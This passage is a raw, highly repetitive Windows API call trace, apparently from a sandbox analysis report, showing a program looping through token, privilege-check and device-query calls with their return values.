OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.227] GetLastError () returned 0x3f0 [0085.227] GetCurrentProcess () returned 0xffffffff [0085.227] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.227] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.227] SetLastError (dwErrCode=0x522) [0085.227] CloseHandle (hObject=0x114) returned 1 [0085.227] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.227] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.227] GetLastError () returned 0x578 [0085.227] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.227] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.227] GetCurrentThread () returned 0xfffffffe [0085.227] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.228] GetLastError () returned 0x3f0 [0085.228] GetCurrentProcess () returned 0xffffffff [0085.228] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.228] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.228] SetLastError (dwErrCode=0x522) [0085.228] CloseHandle (hObject=0x114) returned 1 [0085.228] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.228] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.228] GetLastError () returned 0x578 [0085.228] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.228] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.228] GetCurrentThread () returned 0xfffffffe [0085.228] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.228] GetLastError () returned 0x3f0 [0085.228] GetCurrentProcess () returned 0xffffffff [0085.228] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.228] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.228] SetLastError (dwErrCode=0x522) [0085.228] CloseHandle (hObject=0x114) returned 1 [0085.228] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.228] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.228] GetLastError () returned 0x578 [0085.228] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.228] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.228] GetCurrentThread () returned 0xfffffffe [0085.228] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.228] GetLastError () returned 0x3f0 [0085.228] GetCurrentProcess () returned 0xffffffff [0085.228] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.228] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.228] SetLastError (dwErrCode=0x522) [0085.228] CloseHandle (hObject=0x114) returned 1 [0085.228] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.228] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.228] GetLastError () returned 0x578 [0085.228] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.228] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.228] GetCurrentThread () returned 0xfffffffe [0085.228] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.229] GetLastError () returned 0x3f0 [0085.229] GetCurrentProcess () returned 0xffffffff [0085.229] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.229] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.229] SetLastError (dwErrCode=0x522) [0085.229] CloseHandle (hObject=0x114) returned 1 [0085.229] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.229] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.229] GetLastError () returned 0x578 [0085.229] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.229] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.229] GetCurrentThread () returned 0xfffffffe [0085.229] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.229] GetLastError () returned 0x3f0 [0085.229] GetCurrentProcess () returned 0xffffffff [0085.229] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.229] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.229] SetLastError (dwErrCode=0x522) [0085.229] CloseHandle (hObject=0x114) returned 1 [0085.229] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.229] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.229] GetLastError () returned 0x578 [0085.229] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.229] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.229] GetCurrentThread () returned 0xfffffffe [0085.229] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.229] GetLastError () returned 0x3f0 [0085.229] GetCurrentProcess () returned 0xffffffff [0085.229] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.229] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.229] SetLastError (dwErrCode=0x522) [0085.229] CloseHandle (hObject=0x114) returned 1 [0085.229] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.229] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.229] GetLastError () returned 0x578 [0085.229] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.229] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.229] GetCurrentThread () returned 0xfffffffe [0085.229] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.230] GetLastError () returned 0x3f0 [0085.230] GetCurrentProcess () returned 0xffffffff [0085.230] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.230] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.230] SetLastError (dwErrCode=0x522) [0085.230] CloseHandle (hObject=0x114) returned 1 [0085.230] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.230] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.230] GetLastError () returned 0x578 [0085.230] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.230] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.230] GetCurrentThread () returned 0xfffffffe [0085.230] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.230] GetLastError () returned 0x3f0 [0085.230] GetCurrentProcess () returned 0xffffffff [0085.230] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.230] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.230] SetLastError (dwErrCode=0x522) [0085.230] CloseHandle (hObject=0x114) returned 1 [0085.230] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.230] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.230] GetLastError () returned 0x578 [0085.230] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.230] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.230] GetCurrentThread () returned 0xfffffffe [0085.230] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.230] GetLastError () returned 0x3f0 [0085.230] GetCurrentProcess () returned 0xffffffff [0085.230] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.230] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.230] SetLastError (dwErrCode=0x522) [0085.230] CloseHandle (hObject=0x114) returned 1 [0085.230] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.230] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.230] GetLastError () returned 0x578 [0085.230] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.230] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.230] GetCurrentThread () returned 0xfffffffe [0085.230] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.231] GetLastError () returned 0x3f0 [0085.231] GetCurrentProcess () returned 0xffffffff [0085.231] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.231] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.231] SetLastError (dwErrCode=0x522) [0085.231] CloseHandle (hObject=0x114) returned 1 [0085.231] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.231] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.231] GetLastError () returned 0x578 [0085.231] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.231] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.231] GetCurrentThread () returned 0xfffffffe [0085.231] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.231] GetLastError () returned 0x3f0 [0085.231] GetCurrentProcess () returned 0xffffffff [0085.231] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.231] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.231] SetLastError (dwErrCode=0x522) [0085.231] CloseHandle (hObject=0x114) returned 1 [0085.231] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.231] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.231] GetLastError () returned 0x578 [0085.231] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.231] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.231] GetCurrentThread () returned 0xfffffffe [0085.231] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.231] GetLastError () returned 0x3f0 [0085.231] GetCurrentProcess () returned 0xffffffff [0085.231] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.231] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.231] SetLastError (dwErrCode=0x522) [0085.231] CloseHandle (hObject=0x114) returned 1 [0085.231] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.231] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.231] GetLastError () returned 0x578 [0085.231] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.231] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.231] GetCurrentThread () returned 0xfffffffe [0085.231] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.232] GetLastError () returned 0x3f0 [0085.232] GetCurrentProcess () returned 0xffffffff [0085.232] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.232] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.232] SetLastError (dwErrCode=0x522) [0085.232] CloseHandle (hObject=0x114) returned 1 [0085.232] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.232] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.232] GetLastError () returned 0x578 [0085.232] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.232] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.232] GetCurrentThread () returned 0xfffffffe [0085.232] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.232] GetLastError () returned 0x3f0 [0085.232] GetCurrentProcess () returned 0xffffffff [0085.232] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.232] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.232] SetLastError (dwErrCode=0x522) [0085.232] CloseHandle (hObject=0x114) returned 1 [0085.232] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.232] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.232] GetLastError () returned 0x578 [0085.232] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.232] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.232] GetCurrentThread () returned 0xfffffffe [0085.232] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.232] GetLastError () returned 0x3f0 [0085.232] GetCurrentProcess () returned 0xffffffff [0085.232] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.232] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.232] SetLastError (dwErrCode=0x522) [0085.232] CloseHandle (hObject=0x114) returned 1 [0085.232] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.232] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.232] GetLastError () returned 0x578 [0085.232] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.232] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.232] GetCurrentThread () returned 0xfffffffe [0085.232] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.233] GetLastError () returned 0x3f0 [0085.233] GetCurrentProcess () returned 0xffffffff [0085.233] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.233] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.233] SetLastError (dwErrCode=0x522) [0085.233] CloseHandle (hObject=0x114) returned 1 [0085.233] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.233] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.233] GetLastError () returned 0x578 [0085.233] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.233] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.233] GetCurrentThread () returned 0xfffffffe [0085.233] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.233] GetLastError () returned 0x3f0 [0085.233] GetCurrentProcess () returned 0xffffffff [0085.233] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.233] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.233] SetLastError (dwErrCode=0x522) [0085.233] CloseHandle (hObject=0x114) returned 1 [0085.233] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.233] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.233] GetLastError () returned 0x578 [0085.233] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.233] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.233] GetCurrentThread () returned 0xfffffffe [0085.233] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.233] GetLastError () returned 0x3f0 [0085.233] GetCurrentProcess () returned 0xffffffff [0085.233] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.233] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.233] SetLastError (dwErrCode=0x522) [0085.233] CloseHandle (hObject=0x114) returned 1 [0085.233] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.233] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.233] GetLastError () returned 0x578 [0085.233] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.233] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.233] GetCurrentThread () returned 0xfffffffe [0085.234] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.234] GetLastError () returned 0x3f0 [0085.234] GetCurrentProcess () returned 0xffffffff [0085.234] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.234] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.234] SetLastError (dwErrCode=0x522) [0085.234] CloseHandle (hObject=0x114) returned 1 [0085.234] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.234] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.234] GetLastError () returned 0x578 [0085.234] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.234] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.234] GetCurrentThread () returned 0xfffffffe [0085.234] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.234] GetLastError () returned 0x3f0 [0085.234] GetCurrentProcess () returned 0xffffffff [0085.234] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.234] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.234] SetLastError (dwErrCode=0x522) [0085.234] CloseHandle (hObject=0x114) returned 1 [0085.234] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.234] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.234] GetLastError () returned 0x578 [0085.234] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.234] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.234] GetCurrentThread () returned 0xfffffffe [0085.234] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.234] GetLastError () returned 0x3f0 [0085.234] GetCurrentProcess () returned 0xffffffff [0085.234] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.234] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.234] SetLastError (dwErrCode=0x522) [0085.234] CloseHandle (hObject=0x114) returned 1 [0085.234] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.234] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.234] GetLastError () returned 0x578 [0085.234] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.234] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.234] GetCurrentThread () returned 0xfffffffe [0085.235] OpenThreadToken (in: 